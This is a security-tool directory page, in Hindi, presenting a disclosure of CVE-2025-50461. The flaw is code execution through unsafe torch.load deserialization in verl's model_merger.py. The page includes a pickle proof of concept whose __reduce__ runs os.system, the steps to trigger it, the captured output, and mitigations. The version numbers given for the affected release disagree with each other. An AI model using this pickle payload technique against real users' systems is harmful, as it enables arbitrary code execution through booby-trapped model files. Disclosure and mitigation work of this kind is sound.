Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-50461 — Technical Details and Exploit for CVE-2025-50461 | Kitploit
उपकरण/GitHubGitHub/anchor0221/cve-2025-50461
Payload GenerationVulnerability AnalysisExploitationPapers & ResearchLearning & EducationBinary Exploitation
GitHubanchor0221/cve-2025-50461

CVE-2025-50461

Technical Details and Exploit for CVE-2025-50461

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-50461: असुरक्षित मॉडल डिसीरियलाइज़ेशन द्वारा दूरस्थ कोड निष्पादन

स्थिति: आरक्षित
यह CVE आईडी असाइन की गई है लेकिन अभी तक आधिकारिक CVE सूची में प्रकाशित नहीं हुई है।

Volcengine के verl 3.0.0 में एक डिसीरियलाइज़ेशन भेद्यता मौजूद है, विशेष रूप से scripts/model_merger.py स्क्रिप्ट में जब "fsdp" बैकएंड का उपयोग किया जाता है। स्क्रिप्ट उपयोगकर्ता द्वारा प्रदान किए गए .pt फ़ाइलों पर weights_only=False के साथ torch.load() को कॉल करती है, जिससे हमलावर मनमाना कोड निष्पादित कर सकते हैं यदि दुर्भावनापूर्ण रूप से तैयार किए गए मॉडल फ़ाइल को लोड किया जाता है। एक हमलावर इसका फायदा उठाकर पीड़ित को एक दुर्भावनापूर्ण मॉडल फ़ाइल डाउनलोड करने और एक विशिष्ट फ़ाइल नाम पैटर्न के साथ स्थानीय निर्देशिका में रखने के लिए मना सकता है। यह भेद्यता स्क्रिप्ट चलाने वाले उपयोगकर्ता के विशेषाधिकारों के साथ मनमाना कोड निष्पादन का कारण बन सकती है।

विवरण

प्रभावित रिपॉजिटरी

  • परियोजना: volcengine/verl
  • प्रभावित संस्करण: <= v0.4.0
  • फ़ाइल: scripts/model_merger.py
  • GitHub स्थायी लिंक: https://github.com/volcengine/verl/blob/v0.3.0.post1/scripts/model_merger.py#L87
  • निर्भरता: PyTorch < 2.6.0

प्रूफ ऑफ कॉन्सेप्ट (PoC)

चरण 1: दुर्भावनापूर्ण मॉडल फ़ाइल बनाएं (malicious.pt)

root@kitploit:~
import pickle
import os

class Malicious:
    def __reduce__(self):
        return (os.system, ("mkdir HACKED!",))

with open("malicious.pt", "wb") as f:
    pickle.dump(Malicious(), f)

चरण 2: नाम बदलें और रखें

root@kitploit:~
mv malicious.pt model_world_size_4_rank_0.pt
mkdir TESTS
mv model_world_size_4_rank_0.pt TESTS/

चरण 3: कमजोर स्क्रिप्ट निष्पादित करें

root@kitploit:~
python scripts/model_merger.py --backend="fsdp" --local_dir="TESTS" --hf_model_path="TESTS"

परिणाम

root@kitploit:~
root@99137c7690ee:/workspace/verl-main# python scripts/model_merger.py --backend="fsdp" --local_dir="TESTS" --hf_model_path="TESTS"
Traceback (most recent call last):
  File "/workspace/verl-main/scripts/model_merger.py", line 440, in <module>
    convert_fsdp_checkpoints_to_hfmodels()
  File "/workspace/verl-main/scripts/model_merger.py", line 88, in convert_fsdp_checkpoints_to_hfmodels
    state_dict = torch.load(os.path.join(local_dir, f'model_world_size_{world_size}_rank_{rank}.pt'),
  File "/usr/local/lib/python3.10/dist-packages/torch/serialization.py", line 1384, in load
    return _legacy_load(
  File "/usr/local/lib/python3.10/dist-packages/torch/serialization.py", line 1630, in _legacy_load
    raise RuntimeError("Invalid magic number; corrupt file?")
RuntimeError: Invalid magic number; corrupt file?
root@99137c7690ee:/workspace/verl-main# ls
'HACKED!'   Notice.txt   TESTS   docker   examples   outputs   pyproject.toml       requirements.txt          scripts    test_prime.sh   tmp    verl.egg-info
 LICENSE    README.md    data    docs     patches    recipe    requirements_sglang.txt   setup.py   tests           verl   verl_demo.log

mkdir HACKED! कमांड पीड़ित के सिस्टम पर निष्पादित होता है।

शमन

  • अपग्रेड करें PyTorch संस्करण 2.6.0 या बाद के संस्करण पर, जो डिफ़ॉल्ट रूप से weights_only=True का उपयोग करता है, जिससे डिसीरियलाइज़ेशन जोखिम कम हो जाता है।
  • कोड संशोधित करें torch.load को कॉल करते समय स्पष्ट रूप से weights_only=True सेट करने के लिए।
  • सत्यापन लागू करें लोड करने से पहले मॉडल फ़ाइल अखंडता की पुष्टि करने के लिए।
  • उपयोगकर्ताओं को शिक्षित करें कि अविश्वसनीय स्रोतों से मॉडल लोड न करें।

सुरक्षित लोड का उदाहरण:

root@kitploit:~
state_dict = torch.load(path, map_location="cpu", weights_only=True)

CVE स्थिति

लेखक

  • खोजकर्ता: Yu Rong (戎誉) और Hao Fan (凡浩)
  • संपर्क: [[email protected]]
टूल डाउनलोड करें
क्षेत्रमान
CVE IDCVE-2025-50461
CVSS स्कोरनिर्धारित किया जाना है
CWECWE-502: अविश्वसनीय डेटा का डिसीरियलाइज़ेशन
रिपोर्ट दिनांक2025-04-30
खुलासा दिनांक2025-08-15
प्रभावित संस्करण<= v0.4.0
फिक्स संस्करण